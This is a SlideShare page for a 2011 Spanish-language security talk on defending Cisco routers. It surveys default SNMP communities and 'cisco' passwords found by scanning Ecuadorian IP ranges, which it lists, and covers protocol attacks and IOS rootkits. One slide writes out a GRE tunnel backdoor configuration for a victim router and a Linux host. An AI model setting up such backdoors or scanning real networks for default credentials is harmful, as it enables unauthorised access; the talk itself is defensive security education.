Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Defendiendo Nuestro Router CISCO

6,620 views

Published on

Diapositivas de la charla "Defendiendo Nuestro Router CISCO" en el evento E-Security Conferences, en Guayaquil, Ecuador.

Seguime en Twitter: @KFS

Published in: Technology
  • Be the first to comment

Defendiendo Nuestro Router CISCO

  1. 1. DEFENDIENDONUESTRO ROUTER CISCO by Leonardo Pigñer (@KFS) e-security conferences Guayaquil, Ecuador - 2011
  2. 2. Leonardo PigñerDirector de Servicios Profesionales @base4sec @ekoparty @KFS KUNGFOOSION.com
  3. 3. Agenda1. ¿Por Qué Cisco?2. Tipos de Ataques3. Puertas Traseras4. Recomendaciones
  4. 4. ¿Por Qué Cisco?Source: http://newsroom.cisco.com/documents/10157/1204766/Public_Corporate_Overview_FY11_Q3.pdf
  5. 5. ¿Por Qué Hackear Routers? SECURITY
  6. 6. ¿Por Qué Hackear Routers?“El Administrador de Red”
  7. 7. Actualizaciones Complejas...
  8. 8. - Licencias ($$$)- Hardware Descontinuado
  9. 9. ¿Cómo Conseguir “Estadísticas” de ECUADOR?
  10. 10. Registro de Direcciones de Internet Para América Latina y Caribewget ftp://ftp.lacnic.net/pub/stats/lacnic/delegated-lacnic-latest lacnic|CO|ipv4|186.1.248.0|2048|20110822|allocated lacnic|BO|ipv4|186.2.0.0|16384|20090105|allocated lacnic|PY|ipv4|186.2.192.0|8192|20100827|allocated lacnic|EC|ipv4|186.3.64.0|16384|20091216|allocated lacnic|EC|ipv4|186.3.128.0|32768|20100427|allocated lacnic|CR|ipv4|186.4.0.0|16384|20091118|allocated lacnic|AR|ipv4|186.4.64.0|16384|20100826|allocatedperl lacnic_parser.pl
  11. 11. 157.100.0.0/16 190.12.32.0/19 190.154.0.0/17 192.207.40.0/24 200.12.169.0/24 200.105.224.0/20186.0.144.0/21 190.15.128.0/20 190.154.128.0/17 192.207.41.0/24 200.12.196.0/22 200.105.240.0/20186.3.0.0/18 190.52.64.0/20 190.155.0.0/17 192.207.42.0/24 200.14.34.0/24 200.107.0.0/19186.3.64.0/18 190.52.192.0/20 190.155.128.0/17 192.207.65.0/24 200.14.83.0/24 200.107.32.0/19186.3.128.0/17 190.57.128.0/18 190.214.0.0/17 192.207.66.0/24 200.16.94.0/24 200.107.248.0/21186.4.128.0/17 190.94.128.0/19 190.214.128.0/17 192.207.67.0/24 200.24.192.0/19 200.110.64.0/20186.5.0.0/17 190.95.128.0/19 192.188.44.0/24 192.207.68.0/24 200.25.128.0/19 200.110.80.0/20186.42.0.0/17 190.95.160.0/19 192.188.45.0/24 192.207.244.0/24 200.25.160.0/19 200.110.112.0/20186.42.128.0/17 190.95.192.0/19 192.188.46.0/24 200.0.28.0/22 200.25.192.0/20 200.110.232.0/21186.43.128.0/18 190.95.224.0/19 192.188.47.0/24 200.0.63.0/24 200.25.208.0/20 200.115.32.0/20 1.698.560186.46.0.0/17 190.96.96.0/21 192.188.48.0/24 200.0.73.0/24 200.29.240.0/21 200.124.224.0/20186.46.128.0/17 190.99.72.0/21 192.188.49.0/24 200.0.74.0/24 200.49.240.0/21 200.124.240.0/20186.47.0.0/16 190.107.64.0/20 192.188.50.0/24 200.0.75.0/24 200.50.232.0/21 200.125.128.0/20186.65.0.0/18 190.107.232.0/21 192.188.51.0/24 200.0.76.0/24 200.55.224.0/20 200.125.144.0/20186.66.0.0/17 190.108.64.0/21 192.188.52.0/24 200.0.77.0/24 200.55.248.0/21 200.125.192.0/19186.66.128.0/17 190.110.192.0/19 192.188.53.0/24 200.0.78.0/24 200.63.192.0/19 200.125.224.0/19186.68.0.0/15 190.111.64.0/20 192.188.54.0/24 200.1.6.0/24 200.63.224.0/20 200.126.0.0/19186.70.0.0/15 190.120.64.0/20 192.188.55.0/24 200.1.161.0/24 200.63.240.0/20 201.217.64.0/19186.101.0.0/16 190.120.80.0/20 192.188.56.0/24 200.1.172.0/24 200.69.160.0/20 201.217.96.0/19186.178.0.0/16 190.123.0.0/20 192.188.57.0/24 200.7.83.0/24 200.69.176.0/20 201.218.0.0/19190.8.180.0/22 190.123.48.0/20 192.188.58.0/24 200.7.192.0/19 200.73.200.0/21 201.218.32.0/19190.9.160.0/20 190.130.128.0/17 192.188.59.0/24 200.7.224.0/19 200.85.80.0/21 201.219.0.0/19190.9.176.0/20 190.131.0.0/18 192.188.60.0/24 200.9.96.0/24 200.90.152.0/21 201.219.32.0/19190.10.128.0/18 190.131.64.0/18 192.188.194.0/24 200.9.176.0/24 200.93.192.0/19 201.238.128.0/19190.10.192.0/18 190.131.128.0/18 192.188.195.0/24 200.9.248.0/24 200.93.224.0/20 201.238.160.0/20190.11.0.0/19 190.152.0.0/17 192.188.196.0/24 200.10.147.0/24 200.93.248.0/21 201.238.176.0/20190.12.0.0/19 190.152.128.0/17 192.188.197.0/24 200.10.148.0/22 200.105.112.0/21
  12. 12. Errar es Humano, ¿Perdonar es Divino?- SNMP por Default- Contraseñas Débiles- Vulnerabilidades- Protocolos
  13. 13. SNMP Simple Network Management Protocol
  14. 14. SNMP Simple Network Management Protocol• Versiones: SNMPv1 - SNMPv2 - SNMPv3• MIB: Base de Información de Administración• Comunidad = Contraseña - “public” = comunidad de lectura - “private” = comunidad de escritura
  15. 15. DEMO Tripper.pl by @KFS
  16. 16. SNMP Scanning - Public - Private
  17. 17. Total = 1.695.560 SNMP “default” = 5.925 0% - Public = 5.465 - Private = 460 100%SNMP Default
  18. 18. OTROS = 4.713 CISCO = 1.212 20% 80%Dispositivos Cisco
  19. 19. 11.2(16)P = 1 12.3(3a) = 2 12.0(11) = 1 12.3(3g) = 1 12.0(28b) = 2 12.3(8)YG4 = 1 12.0(5.4)WC(1) = 2 12.3(8)YI3 = 12 12.4(10) = 1 Versiones de IOS 12.0(7) = 2 12.0(7)T = 5 12.4(10b) = 4 12.1(27b) = 1 12.4(11)T = 4 12.1(5)T10 = 2 12.4(11)XW7 = 1 12.1(5)T8 = 1 12.4(12a) = 3 12.1(8c) = 1 12.4(15)T4 = 46 12.2(15)T = 1 12.4(15)T5 = 79 12.2(15)T17 = 1 12.4(15)T7 = 7700 12.2(17) = 1 12.4(15)T9 = 11 12.4(18) = 3 12.2(1a) = 4 12.2(25)SEA = 1 12.4(19) = 168 12.2(25)SEB4 = 1 12.4(19b) = 8 12.2(25)SEE2 = 29 12.4(1a) = 3 12.2(25)SEE3 = 1 12.4(1c) = 11 12.2(33)SB5 = 254 12.4(20)T2 = 4525 12.2(33)SRA = 71 12.4(20)T5 = 1 12.4(24)T = 57 12.2(33)SRC3 = 144 12.2(33)SRD3 = 135 12.4(24)T1 = 7 12.2(4)YH = 2 12.4(24)T2 = 2 12.2(55)SE = 1 12.4(24)T4 = 1 12.2(6a) = 1 12.4(3g) = 3 12.2(8)YN = 1 12.4(3h) = 4350 12.3(11)T = 2 12.4(3i) = 3 12.4(4)T8 = 8 12.3(11)T10 = 1 12.3(11)T2 = 6 12.4(6)T11 = 9 12.3(11)T3 = 1 12.4(6)T7 = 1 12.3(12c) = 1 15.0(1)M2 = 48 12.3(16) = 2 15.0(1)M3 = 5 12.3(22) = 1 15.0(1)M4 = 4175 12.3(23) = 3 15.0(1)M5 = 1 15.0(1)M7 = 4 12.3(26) = 1 15.1(2)T4 = 1 0 11.2 12.0 12.1 12.2 12.3 12.4 15.0 15.1
  20. 20. 12.2• Fin de Venta• Fin de Mantenimiento
  21. 21. TELNET Default Password: “cisco”
  22. 22. CISCO SNMP = 1.212 TELNET “cisco” = 29 1% 99%TELNET con “cisco”
  23. 23. TELNET “cisco” = 29 ENABLE “cisco” = 13 31% 69%ENABLE con “cisco”
  24. 24. DEMO getCISCO by @KFS
  25. 25. ¿vulnerabilidades?
  26. 26. ¿vulnerabilidades?getIOS.pl
  27. 27. ataque a protocolosIRPAS “Internetwork Routing Protocol Attack Suite” Protocolos soportados: • CDP • IRDP • IGRP • EIGRP (discovery) • RIPv1 (discovery) • RIPv2 (discovery) http://www.phenoelit-us.org/ • OSPF (discovery) • HSRP • DHCP DORA • ICMP Redirects
  28. 28. http://www.networkworld.com/news/2011/080411-blackhat-ospf-vulnerability.html
  29. 29. Backdoor con Túnel GRE
  30. 30. Cisco DEMO! interface Tunnel2 ip address 2.2.2.1 255.255.255.0 tunnel source [Publica_Linux] tunnel destination [Publica_Cisco] tunnel mode gre ip Linuxmodprobe ip_greip tunnel add a_VICTIMA_2 mode gre remote [Publica_Cisco] local [Publica_Linux] ttl 255ip link set a_VICTIMA_2 upip addr add 2.2.2.2 dev a_VICTIMA_2ip route add 2.2.2.0/24 dev a_VICTIMA_2
  31. 31. DIK “DA IOS ROOTKIT”Sebastian topo Muñiz
  32. 32. http://cir.recurity.com/cir/default.aspx
  33. 33. TCL Backdoor• Necesita “ENABLE”• IOS 12.2(25) S, 12.3(2) T• Funciona en otras versiones...• “tclsh” DEMO!
  34. 34. Recomendaciones• Actualizar el Software• Deshabilitar Servicios No Usados• Bloquear el Tráfico• Segmentar la Red de Administración• Correlacionar Logs @base4sec
  35. 35. ¿preguntas? @base4sec
  36. 36. GRACIAS!!@KFS KUNGFOOSION.com

×